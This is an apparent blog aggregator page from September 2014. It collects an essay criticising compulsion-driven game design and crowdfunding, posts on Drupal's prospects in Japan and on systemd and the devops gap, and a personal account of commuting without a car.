I'm pretty sure The Stanley Parable is Art. There's just one thing bothering me. It doesn't actually offer you any choice. The game is an admission of defeat.

Choice is of course a tricky concept, that was the whole point, so let me be more specific. You could feasibly make a 100% Let's Play of Stanley Parable, covering all the branching paths, and turn it into a sort of Dragon's Lair on Laserdisc. It would lose little in translation, most of the gags would still work. It's not a game about your choices, it's still just about watching theirs.

Live in Your World, Play in Ours

If you're looking for someone to blame (you know, in general), it's easy to point to the incestuous industry. Games are big business and cost a ton to produce. The primary purpose of talking about games is to sell things to gamers, in a market that moves very fast, saturated with product. Hence brands and franchises compete over the attention of customers, preferably through lock-in. It goes beyond ordinary sales, and includes pre-orders, season passes, virtual marketplaces and other monetary aids. Be sure to use a condom.

For several years now though, there has been a counterpoint: the wave of DRM-free indies, Humble Bundles and the wild success of Kickstarter. Notably, industry veterans Tim Schafer and Brian Fargo, known for beloved classics like Monkey Island and Wasteland, each held out their hats and promised to bring back the glory days of old. Gamers rewarded them in spades. Budgets ballooned from a few hundred thousand to several million, spawning further spinoffs. Chris Roberts of Wing Commander fame did even better. He kickstarted Star Citizen to the tune of a few million, but continues to raise funds today with virtual goods and perks for the future game. It now exceeds $50 million in backer funding.

Typical game ad

If I were cynical, which I am, I would say a bunch of people have spent hundreds of dollars each on virtual assets with no guarantee they'll ever work as promised. This is the power of nostalgia mixed with in-engine mockups, and it's clearly very good business. Don't get me wrong, I've funded a few games on Kickstarter too, below retail. But what comes out of these projects is raising some eyebrows, with hype, delays and cancellations galore. I think it points to a deeper issue altogether, driven by games but not limited to gaming.

On the surface these developers are giving their fans exactly what they want. Something they already love, modernized and expanded, with early access and feedback. You cannot fault the creators for this. Rather, I think the problem is that gaming fans don't know what they want. It's a know it when I see it kind of affair. So they just ask for more of the same instead, again confusing form with function.

There's an elephant in the room. Everybody does it to some degree, but it's somehow shameful.

Compulsion.

It's even more obvious when you consider that the easy money in gaming isn't actually to bankroll a $200 million console blockbuster, half of which is probably marketing. Rather, it's to put a carefully tuned slot machine under the noses of as many people as possible, like say, a free-to-play smartphone game. With lots of push notifications and time locks, using fictional hooks to create personal investment and a sense of false scarcity. People pull their phones out in elevators and on the toilet, multiple times a day. It's guaranteed brain share if you get in, so much easier than convincing everyone to fork out $50 once, let alone monthly.

The real target audience is a small minority of whales—compulsive users—to buy the virtual currency and goods you mint at will. They subsidize the free users, who in turn provide word of mouth on social media. It's gambling and addiction, by any other name, only now people are betting real money against fake money, so it's legal.

Free to play

Most gamers are familiar with the "one more turn" itch of strategy or puzzle games, the desire to open every chest and read every log, the zombified stares at LAN parties. It's a common trope to be obsessive, but gamers are generally self-aware about it. We don't mind wasting time if it's fun, that's the point, and it gives the Youtubers something to do.

But the Skinner box is still real. Too often we see products that seem to consist mainly of compulsive triggers. Where the developers built a guided theme park ride with only the promise of cake at the end. They set out a generic progression tree and loom a nebulous threat overhead that can only be beaten by a fully armed and operational Level 80 Battlemage. Between you and the end stand a thousand foes and a bunch of fetch/build/shoot/escort quests. Everything will be perfectly scaled to offer the permanent illusion of a challenge you can barely win, and are constantly forced to work for.

I think this kind of game design stems from a fundamental misunderstanding, willful or not, of how games are supposed to work. It's cargo culting the patterns of games and game mechanics, without considering what they're for. Which is the point I'd like to get to.

But first, there's still the elephant.

Crowdfunding
Double Fine Adventure Kickstarter

See, the way these shady free-to-play games work... if we're honest, it kinda matches how Kickstarter plays out. Dramatic concept art. A beloved NPC in need. An XP bar to fill. Stretch goals to level up. Massive online multiplayer with social media tie-ins, rally your friends. Plus of course, unlimited alpha and beta testing until release, bankrolled by you, with additional paid perks along the way.

At the risk of stating the obvious, it's more on point than ever: these things are run by game designers, for gamers. No, put away the tin foil hat. I simply want to suggest that what draws people into these projects bears little relation to what comes out at the end, a release which is merely a coda to a multi-year event. That it is no more about game development than Mario is about saving princesses. That maybe Kickstarter is a sequel to Twitter, the world's #1 video game.

It shows in the lack of polish and sophistication in the games that do manage a release, which reviewers and fans consistently gloss over or forgive. Yes, I'm getting into taste territory here, but let's look at it objectively. Repetitive shoot 'em ups that merely consist of dice rolls and numbers going up. RPGs with fenced off wax-museum towns. Meticulously painted backdrops that belie the lack of depth. Or alternatively, pixel art and chiptunes.

Indies

On the surface these games have all the trappings of the classic gaming age, remade in widescreen HD or quirky indie glory, but they lack lasting power once you stop playing. Far from evolving the real classics, of which there are admittedly not actually that many, we've regressed and turned them into caricatures of themselves, mistaking technical limitations for a lack of ambition.

The Carrot and the Stick

If at this point you think I'm wearing rose-tinted glasses so fabulous I'm farting rainbows, allow me to convince you otherwise. I'm not pretending that classic DOS or NES games with giant clunky controls were the height of interaction design, or that early 3D wasn't butt-ugly in retrospect. Features like hint systems and autosaves are nice. Rather, there's a reason people continue to cite the same few classics.

Fallout, Freespace, Outcast, Master of Orion, Rollercoaster Tycoon, System Shock, Thief and Torment are still high points in gaming, and it isn't because they were/weren't Art, or are/aren't crappy by modern standards.

To this day, each of those games presents an understandable, flexible sandbox. They offer you a world with consistent rules, letting you figure out the mechanics to face the game's challenges your way. You explore environments at your own pace, build at your leisure, and you're driven forward because you want to, not because you have to. Compulsion is a side-effect of existing motivations, which naturally result from actively participating in the game world.

Classics

If I go through an airlock in System Shock 2, it's because I need what's on the other side of it, and I hope to return alive from it. The game presents a choice and then dares me to take it.

If I go through an airlock in Mass Effect 3, it closes permanently because everything looks the same and too many players got turned around in testing. There is never a reason to go back. The game presents a mistaken illusion of freedom and has to clamp down to fix it.

Corridor shooters with random chest high barriers, indestructible plot armor, keys hanging next to locks, breadcrumbed objective markers, one-way quick travel or chutes, rock-paper-scissors busywork, teleporting AI... these are all just symptoms of a broken game world, which needs dramatic patch jobs to make basic gameplay not fall apart. If a level designer locks a door with the Red Key, they're just putting a meaningless fetch quest in your path to keep you busy. If they put two elite guards and an alarm there instead, now you have the opportunity for improvisation and consequence. That can only happen when there are options beyond "Use Shotgun on Face" and you've been given space and time to get confident about it.

Instead, many games are explicitly structured in a linear, inflationary manner. What you do at level 50 is mostly the same as level 5, only now the numbers are 10× larger, and you shoot blue instead of green.

Classics

The role of game mechanics should not be the oppressive tyrant telling you to fetch and grind and be thankful for your crumbs of XP and DPS as the scenery blazes past. It should be an à-la-carte menu of options which is opened up for your benefit and at your direction. Slow enough that you can get familiar with each element in turn, but fast enough not to frustrate and limit. Unlockables and crafting should be a way to enable new abilities, not just busywork. Level ups should let you specialize in certain tactics, not just keep up with the Joneses who all bought new glass armor and plasma rifles overnight. Compulsion is just a stick, not the carrot.

Ironically I think it's the technical limitations of classic games that often played to their advantage and which modern remakes in particular are screwing up. The spartan graphics served to highlight the mechanics, instead of needing focus rings and prompts. The lack of voices and mocap forced the writing to carry the story. When you can't conjure up massive vistas at will, there's no point in making the player cross giant cities and wastelands. When the entire world is just isometric sprites, it's practical to let the player destroy all of them. For a while there was a really good match between the complexity of the game world and the way it was represented, and I don't think it's a coincidence that this window is where we find many beloved gaming classics.

What might now seem like broken mechanics often had significant effects on gameplay. An amnesiac guard that can't climb ladders has a similar effect to regenerating health: it makes it easier to run away. Except only one of those requires the player to learn their surroundings. Circle strafers had a surprising amount of non-linearity and involved much more acrobatics than FPSes today, and the passive AI of early RTSes acts similarly to modern shooter enemies, which don't engage unless you've spotted them.

Classic games

Gaming is ultimately about forgetting the rules of reality and adopting a whole new set. Realism doesn't matter, wacky rules can be fun, as long as they're consistent and interact in interesting ways.

For modern games to evolve to match their now deceptive superstar looks, to move beyond progress-bar quests and animated puppets with voice boxes, significant advances have to be made. We need real sandbox simulation, autonomous agents and language-capable AI, and it's not as easy to deliver as another sequel or reboot, mainstream or otherwise. It requires building a game that's meant to be played rather than just reacted to.

I just hope enough people remember what actually made the classics work.

September 21, 2014 07:00 AM

September 20, 2014

Dieter Plaetinck

Graphite & Influxdb intermezzo: migrating old data and a more powerful carbon relay


September 20, 2014 07:18 PM

Dries Buytaert

Reflections on Drupal in Japan


I spent the last week in Japan. The goal was two-fold: meet with the Drupal community to understand how we can grow Drupal in Japan, and evaluate the business opportunity to incorporate an Acquia subsidiary in Japan (we already offer Acquia Cloud in Japan using Amazon's Tokyo data center).

I presented at two Drupal meetups in Japan; spent the week meeting with members of the Drupal community, Drupal agencies, large system integrators (IBM, Accenture, Hitachi, Fujitsu, Ci&T and SIOS) and the Japanese government. In between meetings, I enjoyed the amazing food that Japan has to offer.

The community in Japan is healthy; there are some noteworthy Japanese Drupal sites and there are passionate leaders that organize meetups and conferences. The Japanese Drupal community is bigger than the Chinese Drupal community but compared to North America and Europe, the Japanese Drupal community is relatively small; the largest Drupal agency I met with employs 20 developers.

The large system integrators, with the exception of Ci&T, have not done any Drupal projects in Japan. We're way behind our competitors like Sitecore, Adobe Experience Manager and SDL in this regard. All of them enabled the large system integrators to sell and use their products. It was great to meet with all the system integrators to make them aware of Drupal, and the potential it could have for their business. It's clear the large system integrators could benefit from an Open Source platform that allows them to move faster and integrate with more systems.

The biggest challenge is the lack of Japanese documentation, both marketing materials as well as developer documentation. Most Japanese people do not have much confidence in their English speaking ability and struggle to use Drupal or to participate on drupal.org. My recommendation for the Japanese Drupal community is to organize regular translation sprints. Translating one or more of the best-selling English Drupal books to Japanese could also be a game-changer for the community.

Another problem has been the historic challenges with drupal.jp. The anonymous owner of the domain drupal.jp claims that drupal.jp is the official Drupal site in Japan (it's not officially approved) and runs it without much regard or consultation with the broader Japanese Drupal community. I promised the Japanese community to help fix this.

I returned from my trip feeling that the Japanese market offers a great opportunity for Drupal. Japan is the world's third-largest economy, after the United States and China. With continued leadership, Drupal could be huge in Japan. I’d love that, as I would like to go back and visit Japan again.

Japan

by Dries at September 20, 2014 06:46 PM

Kris Buytaert

On Systemd and devops

If it's not broken, don't fix it.
Those who don't understand Unix are doomed to reinvent it, poorly.
Complexity is the enemy of reliability.

These are some of the more frequently heard arguments in the systemd discussion. Indeed I see and hear a lot of senior Linux people react openly and probably way too late against the introduction of systemd in a lot of our favorite Linux distributions.

To me this is a typical example of the devops gap: the gap between developers writing code and operations needing to manage that code on production platforms at scale.
Often developers write code that they think is useful and relevant while they are not listening to their target audience, in this case not the end users of the systems but the people that are maintaining the platforms, the people that work on a daily basis with these tools.

I have had numerous conversations with people in favor of and against systemd; to this day I have not found a single general purpose use case that could convince me of the relevance of this large change in our platforms. I've found edge cases where it might be relevant, but not mainstream ones. I've also seen many more people against it than in favor. I've invited speakers to conferences to come and teach me. I've probably spoken to the wrong people.

But this is not supposed to be yet another systemd rant. I want to tackle a bigger problem: the problem that this change and some others have been forced upon us by distributions that should be open and listen to their users; apparently both Debian and Fedora/RHEL have largely failed to listen to their respective communities. Yes, we know that e.g. Fedora is the development platform and acts as a preview of what might come up in RHEL, and thus CentOS, later, but not everything eventually ends up in RHEL. So it's not like we didn't have an 'acceptance' platform where we could play with the new technology. The main problem here is that we had no simple way to stop the pipeline; it really feels like that long-ago Friday evening rush deploy, not like a good conversation between developers and actual ops on the benefits and problems of implementing these changes. This feels like the developers of the distributions deciding what goes in from their own little silo and voting in a 'private' committee.

It also feels like the ops people being too busy to react: "Someone else will respond to this change, it's trivial, this change is wrong, someone else will block this for sure."

And the fact that indeed Operating System developers, like Fedora and Debian friends kinda live in their own silo. (specifically not listing CentOS here..)

So my bigger question is: how do we prevent this from happening again? How do we make sure that distributions actually listen to their core users and not just the distribution developers?

Rest assured, systemd is not the only case with this problem. There are plenty of cases where features that were used by people, sometimes even something people considered the core feature of a project, got changed or even ripped out by the developers because they didn't realize they were being used, sometimes almost killing that Open Source project by accident.
And I don't want that to happen to some of my favourite open source projects.

by Kris Buytaert at September 20, 2014 05:52 PM

September 19, 2014

Dieter Adriaenssens

How I got more relaxed by no longer commuting by car

Yesterday was car free day, at least in Belgium, and by a happy coincidence I came across an article that pointed out a correlation between mental well-being and the means of transportation when commuting to work. It turns out that not using a car, e.g. going by bike, on foot or by public transport, improves your mental health. The author wonders about the reason for this.

I'm not a psychologist, nor have I done scientific research to investigate this, but from my personal experience, I can think of a few reasons why not driving by car to commute is better for you.

A few years ago, I was commuting daily by car. Construction works were going on for a few months, so every morning I spent 20-30 minutes in a traffic jam (on top of the 30 minute drive it took me to get to work).
Those 20-30 minutes of waiting, driving slowly, accelerating and braking again, more waiting, ... well, it annoyed me, and I guess a lot of other people don't like traffic jams either.

A few months later, I was told the contract of my company lease car was about to end and I would get a new one.
Then I started wondering if I really liked spending that much time in traffic jams every day, 50-60 minutes of doing nothing else but staring at the car in front of me. So I started looking for alternatives. It turned out there was a train station within walking distance from my office, and it would take me 50-60 minutes to get from home to work. No gain in travel time (and it would take me less time by car if there were no traffic jam), but I would spend about 45 minutes in a train, not having to pay attention to the cars in front of me, not having the stress and boredom of waiting in a traffic jam. I could listen to some music, read a bit, take a nap, stare out the window enjoying the scenery passing by or have a chat with a fellow commuter.
So instead of spending about an hour getting annoyed and stressed, I could relax while the train driver got me to work and I could get some things done in the meantime.

So I declined the offer of a new lease car and decided to commute by train. I couldn't have made a better decision. From that moment on I arrived more relaxed at work and at home. Of course, commuting by train can be stressful as well: delayed or cancelled trains, crowded with noisy people. But I was lucky to have a quiet commuter train in the morning, and I could usually avoid rush hour in the evening, so I usually had a comfortable commute, arriving at work or at home much more relaxed.

Commuting by train can be annoying as well, if you have to cope with long commutes, multiple stop-overs, delays and crowded trains on a daily basis, as I experienced a few years later on another job (but at least I could still doze off or read a bit).
But I was relieved when I found a job closer to home that would take me 20 minutes by bike. No reading this time while commuting, but having the daily physical exercise and cruising past rows of waiting cars was enjoyable (I'm not gloating, actually; I took a route through the car free city center, so I didn't see that many cars on my way to work), but I knew that if I went to work by car I would end up in a traffic jam and it would take me much longer to get to work.

I don't use the car that much anymore, only for longer drives, places that are hard to reach by public transport, or when transporting heavy or bulky loads. And I like it. I can't imagine losing multiple hours waiting in traffic jams every week.
Overall I'm more relaxed because I don't get annoyed waiting, can do some enjoyable things while commuting or get some physical exercise (which is also known to reduce stress levels).

As a consequence you have to make some compromises and it will take some extra planning, but it's worth it.

by Dieter Adriaenssens (noreply@blogger.com) at September 19, 2014 01:44 PM